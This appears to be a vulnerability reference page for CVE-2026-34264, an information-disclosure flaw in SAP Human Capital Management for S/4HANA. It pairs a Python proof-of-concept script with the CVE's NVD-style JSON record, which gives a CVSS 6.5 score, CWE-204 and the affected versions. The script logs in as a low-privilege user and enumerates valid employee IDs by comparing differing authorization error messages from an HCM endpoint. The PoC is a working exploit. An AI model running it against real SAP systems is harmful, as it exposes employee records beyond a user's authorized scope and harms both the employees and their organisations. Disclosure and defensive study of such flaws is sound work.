CVE-2026-34264

import requests # SAP S/4HANA Information Disclosure PoC # Target: SAP Human Capital Management endpoint # Description: Enumerates valid employee IDs by analyzing response messages. target_url = "https://<sap_host>/sap/bc/webdynpro_abap/sap/hcm_manage_employee" session = requests.Session() # 1. Authenticate as a low-privilege user login_payload = { 'sap-user': 'low_priv_user', 'sap-password': 'password', 'sap-client': '001' } session.post("https://<sap_host>/sap/bc/webdynpro_abap/sap/login", data=login_payload) # 2. Function to check if an ID exists based on error messages def check_employee_id(emp_id): params = {'employee_id': emp_id} response = session.get(target_url, params=params) # Analysis: The system returns a specific message like "Authorization check failed" # if the ID exists but access is denied, vs "Record not found" if it doesn't exist. if "Authorization check failed" in response.text: return f"[+] ID {emp_id} exists (Access Denied - Valid ID)" elif "Record not found" in response.text or "does not exist" in response.text: return f"[-] ID {emp_id} does not exist" else: return f"[?] ID {emp_id} returned unknown response" # 3. Enumeration loop print("Starting enumeration...") for i in range(1000, 1010): result = check_employee_id(i) print(result)

{"cve": {"id": "CVE-2026-34264", "sourceIdentifier": "[email protected]", "published": "2026-04-14T01:16:04.200", "lastModified": "2026-05-04T14:51:26.123", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "During authorization checks in SAP Human Capital Management for SAP S/4HANA, the system returns specific messages. Due to this, an authenticated user with low privileges could guess and enumerate the content shown, beyond their authorized scope. This leads to disclosure of sensitive information causing a high impact on confidentiality, while integrity and availability are unaffected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:s4hcmrxx_100:*:*:*:*:*:*:*", "matchCriteriaId": "5384DC3A-9770-407E-89F1-9FC134B5CF50"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:s4hcmrxx_101:*:*:*:*:*:*:*", "matchCriteriaId": "FC80DB20-E930-410F-9972-CA4CF94CA9B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:s4hcmrxx_102:*:*:*:*:*:*:*", "matchCriteriaId": "993CDDD4-73D5-47F5-8017-A47B151F6CD0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:sap_hrrxx_600:*:*:*:*:*:*:*", "matchCriteriaId": "ABD7D918-79F2-44BB-94A4-8950DAF2B4EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:sap_hrrxx_604:*:*:*:*:*:*:*", "matchCriteriaId": "22796CDB-3AAA-4323-8A5B-69C61CC2EF46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:sap_hrrxx_608:*:*:*:*:*:*:*", "matchCriteriaId": "3321A186-7B46-42C7-B4B6-FAB96608BBF5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:a:sap:s\\/4hana:-:*:*:*:*:*:*:*", "matchCriteriaId": "61225714-D573-435F-9423-7AE6A8ED59BC"}]}]}], "references": [{"url": "https://me.sap.com/notes/3680767", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]", "tags": ["Permissions Required"]}]}}